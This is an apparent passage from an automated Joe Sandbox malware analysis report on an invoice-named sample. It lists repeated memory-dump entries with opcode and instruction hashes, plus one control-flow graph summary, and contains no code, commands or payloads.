                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e4f58c3a1a6bbc94c4636808b92e5f94ecee4b907cf57777bd5dede82762b923
                                                  • Instruction ID: afd19f50f6b2964ad1ea4938c73b1c080a3c82b3a9497d2f8941eb70d5f8b2e7
                                                  • Opcode Fuzzy Hash: e4f58c3a1a6bbc94c4636808b92e5f94ecee4b907cf57777bd5dede82762b923
                                                  • Instruction Fuzzy Hash: C0F08274A01248EBDB04DBA9C949B6EB7F8AF08748F804098E611EF2C1DA74D905C759
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1ca6b398aded3fb1b1e40366102636f216bdd75fd7241470ee0e3abd3ec1044e
                                                  • Instruction ID: 58bd47d906eb78dfaa1f48589146183d07c4044461840fffa2c453c8bc330dd2
                                                  • Opcode Fuzzy Hash: 1ca6b398aded3fb1b1e40366102636f216bdd75fd7241470ee0e3abd3ec1044e
                                                  • Instruction Fuzzy Hash: 69F08270A01248EBEB04DBA9C959A6EB7F8AF08708F800098E601EF2C1EA74D905C759
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f432f91097ace28ae90b6ca321b65a7a8c0cd86144e8ef9d9959e89d0233b74b
                                                  • Instruction ID: a367a2551445c6118c038d1db7f9d5ec23fd400cbb2376b3c54942a2d666ac2d
                                                  • Opcode Fuzzy Hash: f432f91097ace28ae90b6ca321b65a7a8c0cd86144e8ef9d9959e89d0233b74b
                                                  • Instruction Fuzzy Hash: 2FF08270A01248EBDB04DBA9C85AB6EB7F8EF08708F904098E601EF2C1DA74D905C759
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ef88c706addb35d85c831c5a3156591d05a9831774649f3f6a7e8cf2705cbbc3
                                                  • Instruction ID: f4d0d2e0bbaa2ce7d67bacb037154f42ae7e18142874b1d1352db9393ba4a42b
                                                  • Opcode Fuzzy Hash: ef88c706addb35d85c831c5a3156591d05a9831774649f3f6a7e8cf2705cbbc3
                                                  • Instruction Fuzzy Hash: D2E06872A418206BE3115F19EC04F77739EEFD4A50F494435FA44CB210DA28DC02C7E1
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7fb8b229e0179ed1d94183841a0f137a63d66d46d99527f7ccba905b47740c18
                                                  • Instruction ID: 9b91792bab32be4e6867306735ddd16b8191aec094e52bebb5e2da9b9a471e69
                                                  • Opcode Fuzzy Hash: 7fb8b229e0179ed1d94183841a0f137a63d66d46d99527f7ccba905b47740c18
                                                  • Instruction Fuzzy Hash: 4FF0E5B9205354DFE705CF12C484A957BE5AB957A0FA00094EC458F342EB31EC81C7C2
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 369f009082050829a275a7bbe12d1f068ebee6e8ca6735a7f0af70988af87659
                                                  • Instruction ID: 3c34944a5d303639bd37a38a4788defd8825f1eedf264861b047a3b225c175fa
                                                  • Opcode Fuzzy Hash: 369f009082050829a275a7bbe12d1f068ebee6e8ca6735a7f0af70988af87659
                                                  • Instruction Fuzzy Hash: BFE0E532540711ABE3210A0BCC08F12BB59EF807B1F95C229E9284B190CB60E851CAD0
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c0008614389e4c6b7c8f3a5444dc37d698eba2a91f3b45f08bbf5d080c4fc888
                                                  • Instruction ID: 4b6c217b1c94fe6766502954a242c3ffbc563ed05eb9a072adf9df5184fc1bac
                                                  • Opcode Fuzzy Hash: c0008614389e4c6b7c8f3a5444dc37d698eba2a91f3b45f08bbf5d080c4fc888
                                                  • Instruction Fuzzy Hash: E5E06D72610600FBE725DB45DD45FAA73ACEB08720F910658B225960D0DBB0FE40CA64
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
                                                  • Instruction ID: 9f769a537daddd3c4a14e4b938b6848fa52db7b3552fd7e4f1f516aa530ef3a7
                                                  • Opcode Fuzzy Hash: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
                                                  • Instruction Fuzzy Hash: 3AE0EC79D60B849FCB12DB5ACA44F5AB7B6BB84B00F950458A5085F661D724E940DB40
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
                                                  • Instruction ID: 48e041bea4f08c3fdb38cd6d9bd79289bdc0be26355ff3546300544d3484bafb
                                                  • Opcode Fuzzy Hash: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
                                                  • Instruction Fuzzy Hash: A2D012371D094CFBCB129F66DC05F957BA9E794B60F444020B6088B5A0CB3AE950D584
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
                                                  • Instruction ID: 2f0b9fa214e9e4b89c7dd1824c688da9221597a7f4f9d1cf7c6b76661590f5d3
                                                  • Opcode Fuzzy Hash: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
                                                  • Instruction Fuzzy Hash: BEC01232150A44AFC7129A95CD05F0177A9E758B10F400021F3084B570C631E810D644
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                  • Instruction ID: bbd30f1c6ebda76d283d92846794891b02fc0d48cfaa3e4a5131a7bdac80e724
                                                  • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                  • Instruction Fuzzy Hash: E0D0123610024CEFCB01DF41C854D5A772AFFC8710F548019FE190B610CA31ED62DA50
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
                                                  • Instruction ID: 0d059ec11e081cbba18adcbc98e1a506ccf15438fc7fc1580e0f356d56293f1b
                                                  • Opcode Fuzzy Hash: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
                                                  • Instruction Fuzzy Hash: 78C08CB8951A80AAFB1B5B21CD1CB383655AB00B65FD101DCAB081D4B1D76AD801C208
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
                                                  • Instruction ID: 72161fd986c2c5b5bc88b32e5a67c466c325376d4e6461a65b8d2f8cf9a70ec7
                                                  • Opcode Fuzzy Hash: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
                                                  • Instruction Fuzzy Hash: E6C04C397915508FDF05CB1AC688F1977F5B754B50F9504D0E905CF721D724EC00CA12
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a2632a16f70b204dfae8c5c1814234db36af0850f574a879695b5500cad9e47c
                                                  • Instruction ID: d69eb154570b6c17e95139fe1972f0394c4655364fc7edc6de5fd374833d815b
                                                  • Opcode Fuzzy Hash: a2632a16f70b204dfae8c5c1814234db36af0850f574a879695b5500cad9e47c
                                                  • Instruction Fuzzy Hash: AA90026161110082454072594905406600557E13013D1C61AA1548920CC6288C59E26A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a3f72a567cf556843cbbab2d14eb41af65129ed10bb8e0912fed3218058a0e87
                                                  • Instruction ID: 1e41252a66d396e1da31dfbe4984eff34092b1885a5a43812ee1c81b4c582a6e
                                                  • Opcode Fuzzy Hash: a3f72a567cf556843cbbab2d14eb41af65129ed10bb8e0912fed3218058a0e87
                                                  • Instruction Fuzzy Hash: 4490023161540052954072594985546400557E0301B91C516E1418914CCA248D5AA362
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 111e3e0c58112b5739cae31ba0974e78bde281586d92f2aac49dc5e4080bb129
                                                  • Instruction ID: 5704f43ae6bbcd8fc717081c504b29bd7761d8e49b5b33149b1bf1c9e15c4e59
                                                  • Opcode Fuzzy Hash: 111e3e0c58112b5739cae31ba0974e78bde281586d92f2aac49dc5e4080bb129
                                                  • Instruction Fuzzy Hash: 2F90026135100482D50062594515B06000587E1301F91C51AE2058914DC629CC56B127
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0e5413acd7995732518c3fdd24755f020446a3ce254ddc98fd892c309bd4727d
                                                  • Instruction ID: 80a64b869fc9567ecb6e83ab9d08f39b9992103cefc965b18d7d8a52ed383749
                                                  • Opcode Fuzzy Hash: 0e5413acd7995732518c3fdd24755f020446a3ce254ddc98fd892c309bd4727d
                                                  • Instruction Fuzzy Hash: 6990026121140443D54066594905607000547D0302F91C516A3058915ECA398C55B136
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 01ad966f62f5da5d60df921186c643d174acd186de57dd68826324b4823b32a6
                                                  • Instruction ID: 8bf229ec78309c0fd5a44198b59a43a413d42e0588219039dbaa822cdd27fd2d
                                                  • Opcode Fuzzy Hash: 01ad966f62f5da5d60df921186c643d174acd186de57dd68826324b4823b32a6
                                                  • Instruction Fuzzy Hash: 8F9002216110008245407269894590640056BE1211791C626A198C910DC5698C69A666
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f9828fd19374371d34f1838a41ac160a2b8854ac9fcb731e9c306b56bcfbf896
                                                  • Instruction ID: 7a280ac501190bc821dbddbc9ed2343aa4e35c8d9deff968f22fe717cfcab79a
                                                  • Opcode Fuzzy Hash: f9828fd19374371d34f1838a41ac160a2b8854ac9fcb731e9c306b56bcfbf896
                                                  • Instruction Fuzzy Hash: 7590023121140442D50062594909747000547D0302F91C516A6158915EC675CC95B532
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c36bd4c9b58a9983bdfeb2ec5954e17dba2a1e66a96fc514f0c7a410993ad59e
                                                  • Instruction ID: 0d1056ff38af1bff75b1000ad153c4d0d203075290afc639f8a4f313e2fd6fd1
                                                  • Opcode Fuzzy Hash: c36bd4c9b58a9983bdfeb2ec5954e17dba2a1e66a96fc514f0c7a410993ad59e
                                                  • Instruction Fuzzy Hash: 5D90026122100082D50462594505706004547E1201F91C517A3148914CC5398C65A126
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 154ad5031e46cf1d1cafa43f0ab8a3e8a4589aa6b853bc30e39758a6988b03f5
                                                  • Instruction ID: d2bf6d1baf3871a9204db7fa424d0feab649e7a6cae9ea6091e5a6967c7c54fa
                                                  • Opcode Fuzzy Hash: 154ad5031e46cf1d1cafa43f0ab8a3e8a4589aa6b853bc30e39758a6988b03f5
                                                  • Instruction Fuzzy Hash: FA90022121144482D54063594905B0F410547E1202FD1C51EA514A914CC9258C59A722
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 278c3b68ccfd3fb484b8f5270d1ec4b542bad2f595189855b02f7bb676b8c707
                                                  • Instruction ID: 5b8e0468bc0e0208696fba1650dbbebba9ddeeb655106f1867514927e5f867e1
                                                  • Opcode Fuzzy Hash: 278c3b68ccfd3fb484b8f5270d1ec4b542bad2f595189855b02f7bb676b8c707
                                                  • Instruction Fuzzy Hash: 8190022122180082D60066694D15B07000547D0303F91C61AA1148914CC9258C65A522
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 57618d5b7d479758d5e5e85c06b1433aa6a3690b76b1b7cc9049e21a462f4674
                                                  • Instruction ID: 5b447d11115e48e894aba0b7a4ed4b0939bf8467c36f517170a6df08e512745c
                                                  • Opcode Fuzzy Hash: 57618d5b7d479758d5e5e85c06b1433aa6a3690b76b1b7cc9049e21a462f4674
                                                  • Instruction Fuzzy Hash: A890022125100842D54072598515707000687D0601F91C516A1018914DC6268D69B6B2
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d2e2bcecfb7c140bc4fad5747834329a2e681112102c16579ef876dcfa94b2c1
                                                  • Instruction ID: 2e2a67dcd291817d58408974423295191e2f70fece2af608a5bdbdf6dd901732
                                                  • Opcode Fuzzy Hash: d2e2bcecfb7c140bc4fad5747834329a2e681112102c16579ef876dcfa94b2c1
                                                  • Instruction Fuzzy Hash: 7F90022131100043D54072595519606400597E1301F91D516E1408914CD9258C5AA223
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 405648689f16f252299fc5df6d968cfb94b038d7e1c2b31f1b10b59f483575e7
                                                  • Instruction ID: 159897d284f90ea7687cdc1cc3d58df6e043644bcbed639979ca9d842d0fd4a6
                                                  • Opcode Fuzzy Hash: 405648689f16f252299fc5df6d968cfb94b038d7e1c2b31f1b10b59f483575e7
                                                  • Instruction Fuzzy Hash: 4A90023121200182994063595905A4E410547E1302BD1D91AA1009914CC9248C65A222
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 6 3643dfe9-3643dff7 7 3643e039-3643e1d7 6->7 8 3643dff9-3643e033 6->8 9 3643e1d9-3643e1e4 7->9 8->7 9->9 10 3643e1e6-3643e201 9->10 11 3643e207-3643e220 10->11 12 3643e294-3643e298 10->12 15 3643e228-3643e28a 11->15 13 3643e2ba-3643e2be 12->13 14 3643e29a-3643e2b7 12->14 16 3643e2e1-3643e2e5 13->16 17 3643e2c0-3643e2de 13->17 14->13 15->15 18 3643e28c-3643e28d 15->18 19 3643e302-3643e31b 16->19 20 3643e2e7-3643e2ff 16->20 17->16 18->12 20->19
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84425845160.0000000036430000.00000040.00001000.00020000.00000000.sdmp, Offset: 36430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36430000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                  • API String ID: 0-3558027158
                                                  • Opcode ID: bba84479ca0e527e396de878824c251d4087746879150ccee397b5ba28a2125e
                                                  • Instruction ID: 94b8904319238a626ba48b28ba1c0accccd59745f5ebb646630360f42de8b94f
                                                  • Opcode Fuzzy Hash: bba84479ca0e527e396de878824c251d4087746879150ccee397b5ba28a2125e
                                                  • Instruction Fuzzy Hash: 549150F04082988AC7158F54A1612AFFFB1EBC6305F15856DE7E6BB243C3BE8915CB85

